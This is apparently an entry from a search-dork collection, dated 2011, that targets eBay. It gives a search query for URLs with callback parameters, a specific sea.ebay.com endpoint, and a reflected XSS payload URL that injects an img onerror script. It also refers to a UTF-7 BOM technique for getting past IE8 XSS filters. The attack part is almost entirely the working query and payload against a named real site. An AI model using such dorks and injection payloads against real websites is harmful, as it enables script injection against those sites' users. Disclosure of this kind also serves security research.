site:ebay.com inurl:callback

  • 日期:2011-02-11
  • 类别:
  • 作者:anonymous
  • 语法:site:ebay.com inurl:callback
  • Returns:

    http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?

    then:

    http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E

    Can also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS through UTF7-BOM string injection to bypass IE8 XSS Filters